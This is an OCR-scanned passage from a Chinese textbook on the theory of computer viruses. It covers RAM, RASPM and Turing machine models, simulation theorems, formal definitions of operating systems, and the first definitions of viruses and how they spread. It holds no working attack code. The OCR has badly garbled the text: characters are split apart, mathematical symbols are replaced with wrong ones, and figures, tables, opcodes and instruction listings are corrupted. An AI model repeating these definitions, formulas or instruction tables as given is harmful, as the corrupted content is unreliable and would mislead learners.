RAM 程序 而 言 ,存在 时 间 复 杂 度 为 kT(n) 的 RASPM 程序 ,其 中 为 常量 。 

定理 2.2 如果 指令 的 花费 是 一 致 的 或 者 对 数 的 ,那么 对 所 有 时 间 复 杂 度 为 T(z) 的 
RASPM 程序 而 言 ,存在 时 间 复 杂 度 为 kT(n) 的 RAM 程序 ,其 中 人 为 常量 。 


2.2.3 图 灵机 模型 


图 灵机 (Turing Machine,TM) 是 基于 有 限 状 态 自 动机 提出 的 ,也 就 是 说 ,在 读 写 附加 磁 
带 的 同时 TM 修改 自己 的 实际 状态 。 当 且 仅 当 所 有 的 输入 符号 都 被 读 入 并 且 转 入 一 个 接 
收 状 态 时 ,TM 接收 这 个 输入 字符 串 。 从 字面 上 看 ,TM 有 多 种 形式 的 定义 ,但 是 ,从 本 质 上 
来 看 图 灵机 可 以 用 如 图 2-3 所 示 的 模型 来 表示 ,TM 包含 一 个 有 限 控制 器 、 一 条 被 分 为 若干 
单元 的 输入 带 和 一 个 每 次 扫描 一 个 单元 的 带头 。 


alal: la |: [a, als8[ 


| 


有 限 控制 器 


图 2-3 基本 图 灵机 模型 


对 于 这 里 所 讨论 的 单 向 图 灵机 而 言 .输入 带 有 一 个 最 左 单元 ,但 其 右 端 是 无 穷 的 。 带 的 
每 个 单元 装 有 有 穷 符号 集中 的 一 个 符号 。 初 始 状 态 时 ,对 某 个 有 穷 的 n 宇 0, 最 左 的 个 单 
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元 作为 输入 , 它 其 实 是 一 个 符号 串 ,而 且 是 符号 集 的 子 集 。 剩 下 的 无 穷 多 个 单元 内 装 有 空白 
符号 , 它 是 一 个 不 属于 输入 符号 集 内 的 特殊 带 符 号 。 下 面 给 出 图 灵机 的 定义 。 

定义 2.1 图 灵机 (TM) 可 以 用 一 个 七 元 组 来 表示 。 

TM = (Q,3,T,6,g,B,F) 

其 中 ,Q 为 状态 的 有 限 集合 ; 了 为 带 符号 的 有 限 集合 ; B 表示 空白 符号 , 且 BET; 3 为 输入 
符号 集合 ,3ST 且 B43; 6 为 转换 函数 , 它 是 从 QXT 到 QXTX{L,R,N} 的 映射 。 其 中 
工 ,R,NE (QUT) ,它们 分 别 表示 左 移 、 右 移 和 不 动 ,但 对 于 某 些 (g,y)E QXT,6 可 以 无 意 
义 , 记 作 6(q,y) 二 $8; qo 表示 初始 状态 , 且 go EQ; FF 表示 终止 状态 集合 , 且 FSEQ。 

一 开始 TM 的 实际 状态 为 g。。 可 以 通过 依赖 于 前 一 状态 和 转换 函数 来 改变 实际 状态 。 
图 灵机 的 一 次 动作 ,取决 于 带头 扫描 的 符号 和 有 限 控制 器 的 状态 。 一 次 动作 的 效应 表现 如 下 。 

(1) 优先 控制 器 改变 状态 。 

(2) 在 刚刚 扫描 过 的 单元 上 写 一 个 符号 (如 果 人 允许 的 话 ,可 以 使 用 空白 符号 ) ,用 以 替代 
原先 的 那个 符号 。 

(3) 带头 向 右 或 向 左 移动 一 个 单元 ,或 原 地 不 动 。 

图 灵机 (CTM) 可 以 由 多 个 带 组 成 ,但 计算 能 力 和 原始 的 单 带 图 灵机 是 多 向 式 关系 。 曾 
经 有 文献 证 明 ,可 以 用 单 带 TM 来 仿真 多 带 TM。 

定理 2.3 如果 指令 的 代价 是 一 致 的 或 者 对 数 的 ,那么 TM 的 计算 能 力 和 RASPM 的 
计算 能 力 是 相等 的 ,并 且 它 们 的 时 间 耗 费 在 多 项 式 级 别 上 也 具有 可 比 性 。 

虽然 TM 在 计算 机 科学 领域 是 一 个 通用 的 工具 ,但 它 并 不 是 万 能 的 。 在 很 多 问题 上 是 
不 可 能 通过 TM 得 到 答案 的 。 让 我 们 来 考虑 Church 定理 (一 个 系统 是 可 判定 的 , 即 当 给 定 
了 这 个 系统 中 的 任 一 命题 时 ,可 以 找到 一 个 机 械 的 方法 来 判别 它 是 否 为 这 个 系统 中 的 一 条 
定理 ,和 否则 称 作 是 不 可 判定 的 。Church 定理 揭示 了 这 样 一 个 事实 , 即 在 有 的 公理 系统 中 不 
可 能 用 机 械 的 方法 来 判别 一 个 命题 是 否 为 一 条 定理 ,因为 在 这 些 系统 中 ,证 明定 理 的 过 程 不 
可 能 是 机 械 的 , 它 只 能 是 一 种 创造 性 的 劳动 ) ,如 果 存 在 某 个 解决 问题 的 算法 ,那么 该 问题 也 
能 通过 TM 来 解决 。TM 的 停机 问题 就 是 一 个 著名 的 不 可 解 问题 。 

定理 2.4 不 可 能 构建 一 个 TM, 使 用 特殊 输入 来 决定 该 TM 是 否 停机 。 


2.2.4 带 后 台 存储 的 RASPM 模型 


上 面 所 介绍 的 经 典 模型 仅 限于 分 析 单 个 算法 或 程序 。 但 是 ,就 两 个 以 上 的 算法 或 程序 
间 的 联系 而 言 ,是 不 可 能 仅仅 通过 努力 就 能 实现 的 。 为 了 实现 程序 间 的 联系 ,必须 有 一 个 特 
殊 的 带 , 这 样 程序 及 程序 数据 就 能 存储 在 该 带 中 , 称 该 带 为 后 台 存 储 器 。 进 一 步 假 设 所 有 的 
正在 运行 的 程序 都 能 访问 . 读 或 修改 该 带 。 

定义 2.2 包含 后 台 存 储 器 的 随机 访问 存储 程序 计算 机 G(RASPM_ABS) 可 以 用 一 个 
六 元 组 来 定义 。 

村 一 

其 中 ,V 为 含有 输入 字符 、 输 出 字符 及 在 后 台 存 储 器 上 符号 的 非 空 集合 ,此 外 ,也 是 存储 在 存 
储 器 单元 中 的 信息 的 集合 ,统称 为 带 字 母 表 ; U 为 操作 码 的 非 空子 集 :USV; T 为 处 理 器 可 
能 行为 的 非 空 集合 ; f 为 唯一 的 函数 ,使 f: U 一 TT 为 真 的 函数 ; g 表示 指令 指针 的 初始 值 ; 
M 表示 存储 器 的 初始 内 容 。 
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假设 从 带 符号 集 V 到 整数 集 间 的 唯一 ,一 对 一 的 映射 是 有 效 的 (通过 此 方法 ,在 输入 
带 、 输 出 带 以 及 RASPM_ABS 或 RAM 的 存储 器 包含 的 信息 间 就 有 了 一 对 一 的 通信 )。 

如 图 2-4 所 示 ,RASPM_ABS 有 一 个 输入 带 、 一 个 输出 带 及 一 个 后 台 存 储 器 ,它们 都 具 
有 无 限 的 长 度 。 输 入 带 只 能 被 用 来 读 取信 息 , 输 出 带 只 能 用 来 写 信息 ,而 后 台 存储 器 既 可 以 
读 又 可 以 写 。 当 读 或 写 信息 时 ,相应 的 带头 会 向 右 移 一 步 。 在 后 台 存 储 情 况 下 ,有 可 能 发 生 
读 / 写 头 的 直接 移动 。 这 样 ,就 能 将 带 符号 集 定义 成 相同 的 整数 集合 。 


| 二 | … | 六 | 输入 带 
|l 

一 计 全 名 程序 (能 存 

lt i 储 在 存储 Te 

器 中 ) “| 控制 单元 ro 


存储 器 


输出 带 
图 2-4 包含 后 台 存储 器 的 随机 访问 存储 程序 计算 机 (RASPM_ABS) 模 型 


另外 ,计算 机 也 具有 一 个 无 限 长 的 存储 器 。 和 带 有 所 不 同 的 是 ,该 存储 器 可 以 直接 被 寻 
址 (也 就 是 可 以 直接 被 读 或 写 ) 。 存 储 器 的 第 一 个 单元 具有 特殊 的 性 质 , 和 RAM 一 样 被 称 
为 累加 器 。 

在 RASPM_ABS 内 部 , 带 和 存储 器 的 操作 是 由 处 理 器 来 执行 的 。 来 分 析 有 限 集合 USV， 
函数 是 从 本 到 上 U 的 每 一 个 元 素 的 单一 行为 的 映射 。 行为 f(z)( 这 里 操作 码 zxEU) 表 示 指 
令 。 在 RASPM_ABS 中 ,操作 码 (或 指令 ) 存 在 于 由 指令 指针 所 决定 的 地 址 中 ,并 由 处 理 器 
执行 ,同时 也 随 之 设 定 指令 指针 的 新 值 。 操 作 码 处 于 单个 存储 器 单元 中 ,其 参数 则 处 于 下 一 
个 单元 中 。 因 此 ,RASPM_ABS 的 指令 指针 存储 在 两 个 单元 中 : 第 一 个 单元 包含 操作 码 ， 
第 二 个 单元 包含 有 关 的 参数 。 处 理 器 代码 和 指令 集 如 表 2-2 所 示 。 


表 2-2 包含 后 台 存储 器 的 随机 访问 存储 程序 计算 机 (RASPM_ABS) 的 指令 集 


操 作 | 参 数 | 操作 代码 含 义 

LOAD 操作 数 10 将 操作 数 指定 的 值 装 入 累加 器 

STORE 操作 数 20 将 存储 在 累加 器 中 的 值 复制 到 操作 数 指 定 的 单元 中 

ADD 操作 数 30 将 操作 数 指定 的 值 加 到 累加 器 中 

SUB 操作 数 40 从 累加 器 中 减 去 操作 数 指定 的 值 

MULT 操作 数 50 用 操作 数 指定 的 值 与 累加 器 中 的 值 相 乘 

DIV 操作 数 60 用 操作 数 指定 的 值 除 以 累加 器 中 的 值 

AND 操作 数 70 使 累加 器 中 的 值 和 操作 数 指定 的 值 执行 按 位 “与 ”的 操作 
OR 操作 数 80 使 累加 器 中 的 值 和 操作 数 指定 的 值 执行 按 位 “或 ”的 操作 
XOR 操作 数 20 使 累加 器 中 的 值 和 操作 数 指定 的 值 执行 按 位 “ 异 或 ”的 操作 
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续 表 
操 作 | 参 数 | 操作 代码 省 这 
READ 操作 数 Ao 将 输入 带 上 的 值 装 入 操作 数 指定 的 单元 中 
WRITE | 操作 数 B0 将 操作 数 指定 的 值 写 到 输出 带 上 
GET 操作 数 Co 将 后 台 存储 器 上 的 值 装 和 人 操作 数 指定 的 单元 中 
PUT 操作 数 Do 将 操作 数 指定 的 值 写 到 后 台 存储 器 上 
SEEK 操作 数 E0 将 后 台 存储 器 的 读 写 头 移动 到 操作 数 指定 的 位 置 上 
JUMP 标号 FC 修改 指令 指针 使 其 指向 标号 所 指定 的 值 
JGTZ 标号 FD 如 果 累 加 器 中 的 值 为 正 ,那么 修改 指令 指针 指向 标号 所 指定 的 值 
JZERO 标号 FE 如 果 累 加 器 中 的 值 为 零 ,那么 修改 指令 指针 指向 标号 所 指定 的 值 


用 CG) 表 示 存 储 器 中 第 i(i 是 整数 ) 个 单元 的 内 容 , 并 允许 使 用 表 2-3 所 示 的 操作 数 。 


表 2-3 操作 数 类 型 
操 作 数 操作 数 代 码 含义 
i Y I 
[可 2 CO 
| 8 CCGD) 


因为 在 RASPM 中 程序 可 以 修改 自身 ,所 以 使 用 [[i] 类 型 操作 数 的 指令 可 以 用 其 他 的 
指令 代替 ,而且 某 些 操作 也 可 以 用 其 他 操作 来 代替 。 

当然 ,并 不 是 所 有 可 能 的 操作 数 都 能 被 分 派 给 每 一 个 操作 。 如 果 某 个 指令 的 目的 单元 
格 已 经 被 某 个 操作 指定 ,那么 操作 数 允 许 的 类 型 则 为 [站 和 [[i]。 例 如 ,READ 操作 仅 有 
[ 习 或 [[ 门 ] 型 的 操作 数 。 

RASPM_ABS 的 指令 集 和 每 个 操作 的 代码 也 都 包含 在 表 2-2 中 。 用 两 位 阿拉 伯 数 字 
来 定义 操作 的 十 六 进 制 代码 。 第 一 位 数字 和 操作 有 关 , 第 二 位 数字 则 与 操作 数 的 类 型 有 关 。 
这 就 意味 着 如 果 指 令 参 数 是 一 个 操作 数 , 那 么 指令 代码 就 可 以 通过 将 操作 代码 和 操作 数 相 
加 而 计算 出 来 。 

当 指 令 指 针 向 存储 器 寻 址 时 ,如 果 存 储 器 单元 的 内 容 zEV 且 x KU, 也 就 是 说 , 它 既 不 
是 操作 码 , 也 没有 分 配 任何 指令 给 它 , 那 么 计算 机 将 停止 运行 。 

当 打 开 计 算 机 时 ,指令 指针 会 获得 初始 值 9, 并 且 处 理 器 会 立即 执行 通过 g 值 寻 址 到 的 
指令 。 待 执行 的 程序 和 算法 将 由 存储 器 中 的 指令 决定 ,所 以 它 必须 由 存储 器 的 初始 内 容 
(MD 来 决定 。 计 算 机 在 下 述 情况 下 停机 。 

@ 关 机 。 

@ 得 到 指令 指针 所 决定 单元 的 值 , 且 该 值 不 属于 指令 代码 。 

@ 除数 为 零 。 

所 以 ,与 RAM 相 比 ,RASPM_ABS 没有 “停机 ”命令 。 此 外 ,对 于 除数 为 零 的 情况 而 
言 , 当 没有 执行 任何 操作 时 ,是 可 能 创建 一 个 无 限 循环 的 。 

在 每 次 开机 时 ,存储 器 的 内 容 都 是 TM 的 初始 值 , 它 在 关机 时 被 删除 。 不 同 的 是 ,后 台 
存储 器 在 关机 时 仍 能 保留 其 内 容 , 可 以 借用 原始 的 .包含 后 台 存 储 器 的 随机 访问 存储 程序 计 
算 机 来 定义 包含 多 个 后 台 存 储 器 的 随机 访问 存储 程序 计算 机 (Random Access Stored 
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Program Machine with Several Attached Background Storage,RASPM_SABS)。 在 此 , 需 
要 定义 一 个 新 的 指令 。 

定义 2.3 借助 于 RASPM_ABS, 可 以 通过 如 下 的 扩展 来 定义 RASPM_SABS。 

RASPM_SABS 可 以 同时 附 到 更 多 的 后 台 存 储 器 上 。 

所 有 后 台 存 储 器 的 全 部 符号 都 在 V 中 。 

处 理 器 可 能 的 动作 由 某 个 动作 行为 扩展 而 来 。 实 际 的 后 台 存 储 器 可 以 由 这 个 新 指令 
选择 。 

该 指令 执行 后 ,每 个 和 后 台 存 储 器 有 关 的 操作 都 在 实际 的 后 台 存储 器 上 被 执行 。 

如 果 执 行 与 后 台 存 储 器 相关 的 指令 , 且 先 前 没有 给 定 SETDRIVE 指令 ,那么 该 指令 将 
使 用 第 一 个 后 台 存 储 器 。 

当 RASPM_ABS 停机 时 ,如 果 将 要 执行 和 某 个 无 效 的 后 台 存 储 器 相关 的 SETDRIVE 
指令 ,计算 机 将 随 之 停机 。 

定理 2.5 因为 RASPM_SABS 和 RASPM_ABS 相似 ,所 以 它们 可 以 相互 模拟 。 

证 明 : 由 于 证 明 RASPM_ABS 能 够 由 RASPM_SABS 来 模拟 并 没有 太 大 价值 ,所 以 只 
要 证 明 RASPM_SABS 可 以 由 RASPM_ABS 模拟 就 行 了 。 通 过 以 下 的 方法 将 原始 的 、 待 模 
拟 计算 机 (RASPM_SABS) 的 N 个 带 映 射 到 进行 模拟 的 计算 机 (RASPM_ABS) 的 单个 带 
上 。 将 待 模拟 的 计算 机 的 带 按 0 一 N 一 1 的 顺序 进行 编号 ,并 把 第 i 个 带 的 第 j 个 符号 转移 
到 新 带 的 第 NN 十 j 一 i 个 位 置 。 按 如 下 方法 来 修改 进行 模拟 的 计算 机 存储 器 。 

@ 单元 0 是 累加 器 。 

@ 保留 单元 1。 

@ 单元 2 包含 单元 3 到 单元 N 十 2 的 地 址 ,而 单元 3 到 单元 N 十 2 则 包含 了 后 台 存 储 
器 读 写 头 的 位 置 。 

@ 单元 i(3 三 iN 十 2) 包 含 了 第 i 一 3 个 实际 后 台 存 储 器 的 读 写 头 位 置 。 

@ 如 果 该 内 容 没 有 向 后 面 所 述 那 样 被 修改 过 或 被 转移 ,那么 单元 i(N 十 2 二 让 包含 了 
待 模拟 计算 机 的 单元 i 一 (N 十 2) 的 内 容 。 

待 模拟 计算 机 的 指令 必须 被 复制 到 正在 进行 模拟 的 计算 机 的 存储 器 中 ,并 且 需 完成 如 
下 修改 。 

@ 如 果 原 始 程序 要 修改 实际 的 后 台 存 储 器 ,那么 新 带 的 次 序 就 进入 单元 2。 对 于 这 种 
情况 , 则 需要 用 如 下 的 指令 来 代替 原始 指令 SETDRIVE a。 


STORE [1] ;保存 计数 器 

LOAD a ;装载 操作 数 

ADD 3 ;计算 真实 地 址 
STORE [2] ;保存 为 真实 的 磁带 号 
LOAD [1] ;恢复 计数 器 


@ 如 果 原 始 程 序 要 读 或 写实 际 的 后 台 存 储 器 ,那么 单个 后 台 存 储 器 的 头 就 会 移动 到 实 
际 的 位 置 。 现 在 可 以 执行 所 要 求 的 操作 ,并 可 以 修改 实际 的 后 台 存储 器 的 位 置 。 对 写 操作 
(PUT a) 而 言 ,适当 的 指令 如 下 。 


STORE [1] ;保存 计数 器 
SEEK [[2]] ;移动 磁带 头 
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PUT a ;把 操作 数 写 到 磁带 
LOAD [[2]] 7 转载 实际 的 磁带 头 
ADD N ;改变 位 置 

STORE [[2]] 7 保存 新 位 置 

LOMD [1] ;恢复 计数 器 


@ 如 果 原 始 程 序 要 修改 后 台 存 储 器 读 写 头 的 位 置 (SEEK a) ,那么 进行 模拟 的 程序 则 
在 适当 的 单元 按 如 下 的 方式 改变 。 


STORE [2] ;保存 计数 器 

LOAD a ;转载 操作 数 

MULT N ;第 3~5 行 : 计算 磁带 的 实际 位 置 
ADD [2] 

SUB 5 

STORE [[2]] ;保存 新 位 置 

LOAD [1] ;恢复 计数 器 


@ 在 原始 程序 进行 复制 的 过 程 中 ,必须 根据 进行 模拟 计算 机 的 程序 中 的 移动 将 存储 器 
单元 的 标号 进行 解释 。 

这 样 ,就 可 以 通过 其 他 指令 来 取代 某 些 指令 从 而 达到 利用 RASPM_ABS 来 模拟 
RASPM_SABS 的 目的 。 在 对 每 个 指令 ( 待 模拟 的 ) 进 行 模拟 时 所 用 到 的 指令 均 不 多 于 7 
个 。 因 此 ,在 代价 标准 相同 的 基础 上 ,如 果 待 模拟 程序 的 时 间 复 杂 度 为 T(Cz) ,那么 进行 模拟 
程序 的 时 间 复 杂 度 则 不 会 超过 7T(z) ,这 独立 于 和 输入。 如果 考虑 对 数 级 的 代价 标准 ,那么 情 
况 就 会 变 得 更 加 复杂 。 在 这 种 情况 下 ,指令 STORE[1] 和 LOAD[1] 的 代价 是 累加 器 初始 
内 容 的 函数 。 然 而 ,很 明显 累加 器 的 内 容 必 须 通 过 原始 程序 产生 ,而且 与 累加 器 尺寸 的 函数 
相似 ,该 产生 也 具有 对 数 级 的 代价 。 这 就 意味 着 即使 在 最 坏 的 情况 下 ,指令 STOREL1] 和 
LOADL1] 也 可 以 仅 通过 和 某 个 常量 相 乘 来 增加 原始 程序 的 对 数 级 代价 。 上 面 用 来 模拟 指 
令 的 程序 中 包含 了 这 样 一 些 指令 : 执行 带 有 原始 指令 操作 数 的 操作 或 带 有 用 常量 相 乘 后 的 
值 的 操作 (这 里 假设 带 的 个 数 N 为 一 个 常量 )。 因 此 ,原始 程序 的 对 数 级 的 花费 T(z) 仅 被 
提高 到 cT(n)。 

所 以 RASPM_ABS 的 计算 能 力 不 能 通过 使 用 更 多 的 后 台 存 储 器 来 提高 。 了 解 这 些 事 
实 后 ,知道 RASPM_ABS 的 计算 能 力 是 不 可 能 超过 RASPM 的 计算 能 力 的 。 

定理 2.6 任意 RASPM_ABS 都 可 以 用 一 个 RASPM 来 模拟 ,并 且 进 行 模拟 程序 的 代 
价 函数 等 于 待 模拟 程序 的 代价 函数 的 常数 倍 。 

证 明 : 和 定理 2.5 相似 ,现在 开始 将 存储 器 和 后 台 存 储 器 的 内 容 搜寻 到 新 的 存储 器 中 。 
随 之 就 能 得 到 一 个 RASPM, 也 就 是 一 个 没有 后 台 存 储 器 的 计算 机 。 搜 寻 过 程 中 主要 的 区 
别 就 是 原始 存储 器 必须 被 分 成 块 ,因为 搜寻 不 能 分 割 同属 于 一 个 指令 的 单元 。 当 然 ,一 个 新 
的 JUMP 指令 必须 附加 到 每 个 块 的 末尾 。 通 过 这 样 的 方法 ,原始 程序 代码 能 够 被 转移 到 新 
的 存储 器 中 ,而 且 后 台 存 储 器 的 内 容 能 够 被 插入 程序 块 间 。 在 原始 程序 的 转移 过 程 中 ,必须 
根据 进行 模拟 计算 机 的 程序 中 的 移动 将 存储 器 单元 的 标号 进行 解释 。 搜 寻 过 程 中 的 另 一 个 
区 别 就 是 现在 不 需要 利用 单元 来 得 到 实际 的 后 台 存 储 器 的 顺序 (因为 RASPM_ABS 只 包含 
一 个 后 台 存 储 器 ) ,而 且 那 个 仅 有 的 单元 被 要 求 包 含 唯 一 的 读 写 头 的 位 置 。 
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定理 2.6 的 一 个 结论 如 下 。 

定理 2.7 TM 的 计算 能 力 和 RASPM_ABS 的 计算 能 力 相 当 , 并 且 它 们 的 花费 在 多 项 
式 水 平 上 是 可 比 的 。 

证 明 : 由 于 任 一 RASPM_ABS 都 可 以 用 一 个 RASPM 来 模拟 (定理 2. 6) ,因此 反 过 来 
也 成 立 ( 没 有 多 大 价值 ) ,而 且 任 一 RASPM 都 能 用 图 灵机 来 模拟 , 反 过 来 也 同样 成 立 ( 定 理 
2.3), 所 以 RASPM_ABS 也 可 以 用 图 灵机 来 模拟 , 反 过 来 也 成 立 。 代 价 标准 从 定理 2. 3 及 
定理 2.6 中 的 陈述 得 出 。 

RASPM_ABS 的 后 台 存储 器 既 可 以 被 看 成 是 输入 带 ,又 可 以 被 看 成 是 输出 带 , 因 为 假 
设 当 计算 机 启动 时 后 台 存储 器 上 已 有 用 来 输入 的 数据 ,并 且 假 设 在 计算 机 关闭 后 存储 器 也 
能 保留 数据 。 由 于 输入 带 也 包含 了 后 台 存 储 器 的 内 容 , 因 此 在 RASPM 中 后 台 存 储 器 的 角 
色 也 可 以 用 输入 带 来 代替 。 它 可 以 通过 将 偶数 带 单元 指派 给 原始 输入 带 单元 ,将 奇数 带 单 
元 指派 给 后 台 存储 器 单元 来 完成 。 开 机 时 ,RASPM 将 后 台 存储 器 最 初 的 数据 从 输入 带 复 
制 到 程序 块 间 已 有 的 空闲 存储 器 单元 中 (存储 器 分 配 在 定理 2.6 的 证 明 中 已 介绍 过 )。 该 复 
制 的 执行 使 得 复制 程序 只 将 数据 存放 到 程序 块 间 的 偶数 单元 中 (奇数 单元 的 单元 将 被 作为 
临时 的 输出 带 ) 。 当 程序 运行 时 ,并 且 输 入 或 涉及 指令 的 后 台 带 被 执行 ,数据 还 没有 进入 时 ， 
计算 机 读 取 并 自动 恢复 输入 带 中 适当 数量 的 单元 ,直到 达到 指定 的 数据 。 当 程序 试图 写 和 人 
实际 的 后 台 存 储 单元 写 入 存储 器 的 适当 位 置 。 当 然 , 如 果 提 及 的 单元 还 没有 被 读 ,那么 它 必 
须 先 读 。 当 程序 试图 在 输出 带 上 写 时 ,那么 它 将 向 程序 块 间 的 下 一 个 空闲 的 技术 单元 写 。 
在 RASPM 停机 之 前 , 它 将 后 台 存 储 器 以 及 实际 输出 带 的 内 容 放 到 真实 的 输出 带 。 在 这 一 
点 上 ,RASPM 也 能 被 看 作 装备 了 后 台 存 储 器 的 计算 机 。 


2.2.5 操作 系统 模型 


对 于 程序 的 执行 ,应 该 使 用 RASPM_ABS 和 RASPM_SABS。 G=<V,U,T,f,g,M> 
中 的 元 素 V.U、T 和 了 已 经 在 定义 2.2 和 定义 2. 3 中 说 明 。 现 在 ,如 果 能 对 g 和 M 作出 详 
细 说 明 ,那么 就 可 以 给 出 对 计算 机 操作 进行 说 明 的 程序 。 后 台 存 储 器 中 包含 程序 和 数据 文 
件 。 通 过 输入 带 可 以 决定 程序 运行 的 顺序 。 一 个 正在 运行 的 程序 可 以 读 、 写 或 修改 包含 现 
有 程序 和 数据 文件 的 后 台 存 储 器 。 因 此 ,需要 一 个 能 处 理 程序 和 数据 文件 ,并 能 使 指定 的 程 
序 代码 运行 的 框架 程序 。 

定义 2.4 操作 系统 被 定义 成 如 下 的 程序 系统 ,该 程序 系统 能 够 处 理 分 离 的 程序 或 数 
据 文件 ,并 能 使 指定 的 程序 代码 运行 。 给 定 RASPM_ABS 操作 系统 的 定义 ,就 能 发 现 
RASPM_ABS 和 实际 计算 机 系统 间 的 相似 性 , 即 它们 都 有 一 个 后 台 存 储 器 ,用 户 可 以 将 分 
离 的 数据 和 程序 存储 在 该 存储 器 中 ,而 且 , 它 们 都 包含 能 够 处 理 这 些 文 件 的 操作 系统 。 

操作 系统 既 可 以 被 包含 在 存储 器 的 初始 值 M 中 ,也 可 以 被 放置 在 后 台 存 储 器 中 。 对 于 
后 一 种 情况 ,存储 器 的 初始 值 M 包含 一 个 特殊 程序 ,该 程序 从 g 指定 的 地 方 开始 运行 (g 的 
功能 是 从 后 台 存储 器 装载 操作 系统 并 使 其 运行 )。 在 此 情况 下 ,一 般 不 会 将 加 载 的 程序 看 成 
操作 系统 的 一 部 分 。 

定义 2.5 如 果 操 作 系统 被 包含 在 存储 器 的 初始 值 M 中 ,那么 该 操作 系统 被 称 为 专用 
计算 机 的 操作 系统 。 

这 就 意味 着 通过 对 RASPM_ABS 的 详细 说 明 ,操作 系统 也 随 之 被 定义 了 。 
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定义 2.6 如 果 操 作 系统 被 包含 在 后 台 存 储 器 中 ,那么 该 操作 系统 被 称 为 独立 于 计算 
机 的 操作 系统 。 

因此 ,可 以 通过 改变 后 台 存 储 器 来 改变 RASPM_ABS 的 操作 系统 。 

通过 其 他 途径 ,计算 机 能 够 称 为 专用 操作 系统 的 或 独立 于 操作 系统 的 计算 机 。 

定义 2.7 如 果 在 RASPM_ABS 中 ,存储 器 的 初始 值 M 包含 了 操作 系统 ,那么 该 计算 
机 就 被 称 为 专用 操作 系统 的 计算 机 。 

在 此 情况 下 ,计算 机 只 能 使 用 它 自己 的 操作 系统 (当然 ,可 以 编制 一 个 能 够 模拟 其 他 操 
作 系 统 的 程序 ) 。 

定义 2.8 如 果 RASPM_ABS 的 操作 系统 被 包含 在 后 台 存储 器 中 ,那么 就 称 RASPM_ 
ABS 为 独立 于 操作 系统 的 计算 机 。 

当然 , 既 可 以 改变 后 台 存 储 器 ,也 可 以 改变 操作 系统 。 

下 面 的 定理 是 定义 2. 4 一 2. 8 的 直接 结论 。 

定理 2.8 ”如果 用 OO 表示 RASPM_ABS( 用 G 表示) 的 专用 操作 系统 ,那么 G 则 表示 专 
用 操作 系统 的 计算 机 。 

证 明 : 该 定理 没有 太 大 的 价值 ,因为 如 果 O 是 计算 机 G 的 专用 操作 系统 ,那么 G 的 存 
储 器 则 包含 操作 系统 O。 这 就 意味 着 G 是 专用 操作 系统 的 计算 机 。 

定理 2.9 如 果 O 是 独立 于 RASPM_ABS 的 操作 系统 ,那么 G 是 独立 于 操作 系统 的 计 
算 机 。 

证 明 : 该 定理 也 没有 太 大 的 价值 ,因为 如 果 O 是 独立 于 计算 机 G 的 操作 系统 ,那么 O 
包含 在 后 台 存储 器 中 , 而 不 是 包含 在 存储 器 中 。 这 就 意味 着 G 是 独立 于 操作 系统 的 计 
算 机 。 

根据 所 概括 的 一 般 要 求 以 及 ISO 标准 ,操作 系统 是 管理 程序 执行 的 程序 系统 : 调度 执 
行 、 共 享 资源 以 及 建立 唯一 程序 间 的 链接 。 

根据 定义 2.4, 为 了 检查 唯一 程序 间 的 链接 ,可 以 定义 RASPM_ABS 的 操作 系统 。 不 
管 RASPM_ABS 的 操作 系统 是 不 是 专用 的 ,都 可 以 通过 使 用 RASPM_ABS 来 定义 符合 上 
面 所 提 到 的 要 求 的 操作 系统 。 但 是 ,如 果 要 检查 用 来 修改 操作 系统 代码 的 程序 名 ,那么 必须 
使 用 独立 于 操作 系统 的 计算 机 。 否 则 ,它们 就 不 能 对 操作 系统 进行 真正 的 修改 ,因为 计算 机 
的 重新 启动 总 是 会 破坏 临时 的 修改 。 


2.2.6 基于 RASPM_ABS 的 病毒 


在 定义 2.4 中 ,给 出 了 操作 系统 的 定义 , 即 能 够 处 理 并 使 其 运行 的 程序 。 所 以 现在 也 可 
以 给 出 RASPM_ABS 中 病毒 的 定义 。 

定义 2.9 计算 机 病毒 被 定义 成 程序 的 一 部 分 ,该 程序 附着 在 某 个 程序 上 并 能 将 自身 
链接 到 其 他 程序 上 。 当 病毒 所 附着 的 程序 被 执行 时 ,计算 机 病毒 的 代码 也 跟着 被 执行 。 

病毒 不 必 执 行程 序 的 原始 功能 ,但 它们 却 经 常 这 样 做 ,因为 它们 不 想 被 发 觉 。 所 以 , 病 
毒 必须 修改 原 程序 。 在 相反 的 情况 下 ,病毒 可 能 会 重 写 程序 ,这 样 也 就 破坏 了 程序 。 

1. 病毒 的 传播 模型 

正如 现实 中 人 们 所 知道 的 那样 ,病毒 可 以 附着 到 不 同 的 程序 上 ,将 病毒 附着 到 不 同 程序 
上 的 形式 称 为 其 传播 方式 。 病 毒 可 以 有 不 同 的 传播 方式 。 
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定义 2. 10 如果 病 毒 利用 了 计算 机 的 一 些 典 型 特征 或 服务 进行 传播 ,那么 这 种 传播 方 
式 被 称 为 专用 计算 机 的 传播 方式 。 如 果 病 毒 在 传播 时 没有 利用 计算 机 的 服务 进行 传播 , 那 
么 此 传播 方式 被 称 为 独立 于 计算 机 的 传播 方式 。 

当 能 够 被 病毒 感染 的 程序 依赖 于 计算 机 时 ,病毒 的 传播 方式 可 能 是 专用 计算 机 的 传播 
方式 。 例 如 ,在 IBM PC 中 ,引导 型 病毒 具有 专用 计算 机 的 传播 方式 ,因为 引导 扇 区 的 划分 
依赖 于 IBM PC 的 结构 。 为 了 进行 传播 ,IBM PC 中 任何 类 型 的 引导 型 病毒 都 必须 利用 
BIOS 或 磁盘 控制 器 的 服务 。 

当 能 够 被 病毒 感染 的 程序 不 依赖 于 计算 机 时 , 则 病毒 的 传播 方式 可 能 是 独立 于 计算 机 
的 传播 方式 。 例 如 ,可 以 感染 C 源 文件 的 病毒 就 是 具有 独立 计算 机 的 传播 方式 ,因为 它们 
可 以 在 不 同 的 计算 机 上 通过 使 用 相同 的 传播 方式 对 C 源 文件 进行 感染 。 

也 可 以 从 操作 系统 角度 定义 病毒 传播 方式 的 依赖 性 。 

定义 2.11 如 果 病 毒 利用 操作 系统 的 某 些 典型 特征 或 服务 进行 传播 ,那么 这 种 传播 方 
式 被 称 为 专用 操作 系统 的 传播 方式 。 如 果 病 毒 在 传播 期 间 没有 利用 操作 系统 的 服务 进行 传 
播 , 那 么 此 传播 方式 被 称 为 独立 于 操作 系统 的 传播 方式 。 

当 能 够 被 病毒 感染 的 程序 依赖 于 操作 系统 时 ,病毒 的 传播 方式 可 能 是 专用 操作 系统 的 
传播 方式 。 例 如 ,在 DOS 系统 下 ,感染 EXE 文件 的 病毒 就 是 DOS 系统 的 专 有 传播 方式 , 因 
为 ,EXE 文件 结构 具有 DOS 系统 的 特征 。 

